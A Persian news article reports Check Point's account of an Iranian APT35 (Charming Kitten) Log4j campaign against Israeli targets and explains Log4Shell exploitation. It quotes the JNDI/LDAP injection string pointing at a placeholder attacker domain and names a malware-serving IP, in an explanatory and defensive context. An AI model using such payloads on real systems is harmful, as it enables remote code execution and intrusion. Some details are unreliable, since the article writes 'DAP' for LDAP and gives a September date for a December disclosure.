احمد باطبی
شرکت امنیت سایبری «چکپوینت» (CheckPoint) اعلام کرده که روز چهارشنبه پانزدهم دسامبر ۲۰۲۱ حمله سایبری هکرهای وابسته به جمهوری اسلامی را به هفت هدف در اسرائیل ناکام گذاشته است.
این شرکت اسرائیلی-امریکایی گفته گروه هکری موسوم به «بچه گربه ملوس» (Charming Kitten)، از زیرمجموعههای «تهدید پیشرفته مدام ۳۵» (APT 35) تلاش کرده است با استفاده از ضعف امنیتی موجود در نرمافزار «لاگ۴جی» (log4j)، به شبکه داخلی هفت سازمان تجاری و دولتی اسرائیل نفوذ کنند.
این حملهها در بازه زمانی شش صبح تا چهار بعد از ظهر به وقت محلی انجام شده بود که نشان میدهد فعالیت مهاجمان در چارچوب ساعتهای اداری انجام شده است.
APT»، (Advanced Persistent Threat)» اصطلاحی است برای اشاره به تهدیدهای مستمر و سازمانیافتهای که از سوی هکرهای تحت حمایت دولتها سازماندهی و اجرا میشود.
هدف این تهدیدها معمولا دولتهای دشمن و یا رقیب، مخالفان حکومت، سازمانها و نهادهای تاثیرگذار، شرکتٔهای تجاری و مراکز علمی هستند. گروههای تهدید پیشرفته مدام با علامت اختصاری APT و ارقام منتسب به آن شناخته میشوند؛ به عنوان مثال، گروههای APT33 ،APT34 ،APT39 از جمله گروه ایرانی تهدید پیشرفته مدام ایرانی هستند که تحت حمایت جمهوری اسلامی به فعالیتهای مجرمانه اینترنتی مشغولند.
به گفته «چکپوینت»، گروه هکری بچه گربه ملوس از جمله گروههای وابسته به سپاه پاسداران انقلاب اسلامی است که در سالهای اخیر حملههای سایبری فراوانی را علیه روزنامهنگاران، کنشگران و سازمانهای مردمنهاد انجام داده است و حمله به اهدافی در اسرائیلی نیز در کارنامه آنها به چشم میخورد.
نرمافزار لاگ۴جی (log4j) یکی از محبوبترین کتابخانههای «لاگ جاوا» است که تاکنون بیش از ۴۰۰ هزار بار از منبع ناشر آن در مخزن «گیتهاب» (GitHub) دانلود شده است و بسیاری از شرکتها در سراسر جهان از آن استفاده میکنند. بنا بر آمار، از سال ۲۰۱۵ تا کنون بیش از ۱۳ میلیارد دستگاه در سراسر جهان از جاوا استفاده کردهاند که این خود وسعت بالقوه سوء استفاده از این آسیبپذیری را نشان میدهد.
آسیبپذیری یافته شده در این نرمافزار، ۹ دسامبر سال جاری میلادی کشف و تحت عنوان «CVE-2021-44228» گزارش شده بود. این آسیب پذیری که از نوع حاد محسوب میشود، در بسته «لاگ آپاچی۲» (Log4j 2)، نسخه «2.14.1» و قبل از آن وجود داشته است و امکان اجرای کدهای مخرب از راه دور (Remote Code Execution) را برای هکرها فراهم میکند.
کتابخانه لاگ۴جی تقریباً در هر برنامه و سرویس اینترنتی شناخته شده وجود دارد؛ از جمله توییتر، آمازون، مایکروسافت و غیره. هکرها در صورت موفقیت در بهرهبرداری از این آسیبپذیری، میتوانند کنترل سرورهای مبتنی بر جاوا را در اختیار خود گرفته و از آن برای اهداف مختلف استفاده کنند.
مهاجمان با شیوههای مختلف، ازجمله جستوجوی عبارت «logging for Java» در موتور جستوجوگر گوگل و یا با ابزارهای «اسکن»، اهداف آسیبپذیر را یافته و با استفاده از «Log4Shell» و ویژگی «JNDI» موجود در یک برنامه جاوا مرتبط با ماژول آسیبپذیر Log4j 2، رشتهای مانند «${ jndi:ldap://path/to/code}» را بسته به نوع «TCP» مورد استفاده دستگاه هدف، به عنوان بخشی از یک نام کاربری، رمز عبور، شماره تلفن و یا موارد دیگر را به دستگاه هدف ارسال کرده و کنترل آن را به دست میگیرند.
ویژگی «JNDI» به اشیای جاوا اجازه میدهد که در بستر زمان، توسط یک برنامه جاوا بارگذاری شود و مورد استفاده قرار گیرد. پروتکل مورد استفاده این ویژگی نیز «DAP» نام دارد که از جمله پروتکلهای متن باز محسوب و برای دسترسی به اطلاعات دایرکتوری استفاده میشود. مهاجم در واقع با ارسال رشتهای مانند «${ jndi:ldap://[attacker_domain]/file}»، به برنامه دستور میدهد که کلاس «[attacker_domain]/file» را از طریق ویژگی JNDI فراخوانی کند و نتیجه آن را با استفاده از پروتکل DAP به او ارایه دهد.
در مدل خفیفتری از «اکسپلویت» CVE-2021-44228، مهاجم با ارسال یک درخواست «DNS»، دستکاری شده از سرور تحت اختیار خود، اطلاعات محرمانه دستگاه هدف را استخراج میکند.
جاوا نسخه ۸ و بالاتر محدودیتهایی را برای رشتههایی مانند «${jndi:ldap://...}» ایجاد کرده است اما این محدودیتها توان ایستادگی در مقابل حملههای پیچیده را ندارند. چرا که این نرمافزار به زبان «اسکریپت» log4j2’s homebrew، موسوم به (lookups) نوشته شده است که در صورت قدری خلاقیت، میتوان آن را برای دو زدن «IPS» و «WAF» توسعه داد. از سویی دیگر، ساختار این مجموعه کدها به شکلی است که نمیتوان حتی در صورت انتشار وصلهامنیتی نیز تمام مجموعه را وادار کرد که از ماژول وصله شده استفاده کنند.
چکپوینت هشدار داده است که سوء استفاده از این آسیبپذیری، مانند آتش سوزی گسترده در حال فراگیر شدن است و یکی از شایعترین سوء استفادها از این ضعف امنیتی، «کریپتو ماینینگ» crypto mining یا به بردگی گرفتن سرورها و استفاده از توان آنها برای استخراج رمزارز است.
به گفته چکپوینت، تا روز دوازدهم دسامبر، صنایع مالی، بانکی و نرمافزاری دستکم پنج کشور جهان شامل اسرائیل، ایالات متحده، کره جنوبی، سوئیس و قبرس درگیر کریپتو ماینینگ شدهاند.
چکپوینت میگوید اگرچه تاکنون اکثر حملههای کریپتو ماینینگ مبتنی بر سیستمهای عامل لینوکس بودهاند اما در حملات اخیر، بارگذاری تروجانی مبتنی بر «داتنت» به نام «Win32 sfrnp» با فرمت اجرایی (exe)، کشف شده است که طی فرایند «StealthLoader»، سیستمهای عامل ویندوز را آلوده و بر روی آنها یک «crypto-miner» نصب میکند تا بدون اطلاع قربانی، از دستگاه او برای استخراج رمزارز استفاده کند.
تروجان «Win32 sfrnp.exe» در ابتدا تلاش میکند در محیطی ایزوله اجرا شود. در صورت عدم امکان ایجاد محیط ایزوله، این بدافزار در مسیر «C:\Windows\Temp» سیستم عامل ویندوز جای میگیرد و پوشهای جدید به نام «sfrpn»، به تاریخ هفتم ژانویه ۱۹۶۷ ایجاد میکند تا با تعلیق در فرایند اجرا، بیش از پیش خود را از دیدها پنهان کند.
این بدافزار پس از ایجاد پایداری در دستگاه قربانی، یک استخراج کننده اختصاصی سکه «XMRig» به همراه کیف پول شخصی روزارز لمونرو» نصب و از منابع سیستم قربانی برای جلوگیری از شناسایی خود استفاده میکند.
در تصویر زیر، نمونهای از کدهای مخرب کشف شده نمایش داده میشود که کار آن بارگیری نسخهای از «PowerShell script» از طریق پروتکل «HTTP» و نصب چندین نوع از بدافزارها از سروری با «ای پی» 2[.]56.59.123، مستقر در خاک امریکا است.
شرکت چکپوینت در ساعات ابتدایی انتشار گزارش این آسیبپذیری در روز جمعه دهم سپتامبر، در کمتر از ۲۴ ساعت، حدود ۶۰ بهرهبرداری از این آسیبپذیری حاد را رصد و کشف کرده است. این حملهها یک روز بعد یکباره به ۴۰ هزار مورد افزایش یافتند و روز بعد به ۲۰۰ هزار و روز بعد از آن به ۸۰۰ هزار حمله رسیدند.
شرکت چکپوینت برای تشریح سوء استفاده وسیع از آسیبپذیری ویرانگر «CVE-2021-44228»، از عبارت «pandemic» به معنای همهگیری استفاده کرده است که در دو سال اخیر در خصوص عالمگیری ویروس کرونا استفاده شد.
تا لحظه تنظیم این گزارش، ۹۰ کشور درگیر حملههای هکری مبتنی بر آسیبپذیری Log4j 2 شدهاند. بنابر تخمینها، ۵۰ در صد از شبکههای شرکتی درون مرزهای جغرافیایی کشورهای درگیر و ۴۴ درصد از شبکههای شرکتی سراسر جهان تحت تاثیر این حملهها هستند.
شرکت چکپوینت برای ممانعت از گرفتار شدن در درام این ضعف امنیتی، موارد زیر را لازم دانسته است:
رصد و رمزگشایی: تجزیه و تحلیل بار ترافیک شبکه و دستگاههای مرتبط، بررسی «HTTP headers»، استخراج «JSON/XML» و بررسی عادی بودن بار شبکه.
بررسی نشانههای حمله: استخراج محمولههای تبادل شده بین دستگاه و یا شبکه با فضای خارجی و جستوجو برای یافتن نشانههایی از آلودگی، مانند «Remote Code Execution» و یا «Command Injection».
استفاده از موتور ارزیابی متنی: شیوهای برای تعیین نهایی مخرب بودن محموله و امتیاز دهی به شاخصها.
چکپوینت همچنین استفاده از موتورهای جانبی دیگر مانند CloudGuard AppSec، API Protection، Web Anti-Bot، IPS، Schema Validation را برای بررسی مواردی همچون تبادل اطلاعات در دروازههای برنامههای امضاهای الکترونیک و دیگر موارد را توصیه کرده است.
از بخش پاسخگویی دیدن کنید
در این بخش ایران وایر میتوانید با مسوولان تماس بگیرید و کارزار خود را برای مشکلات مختلف راهاندازی کنید
ثبت نظر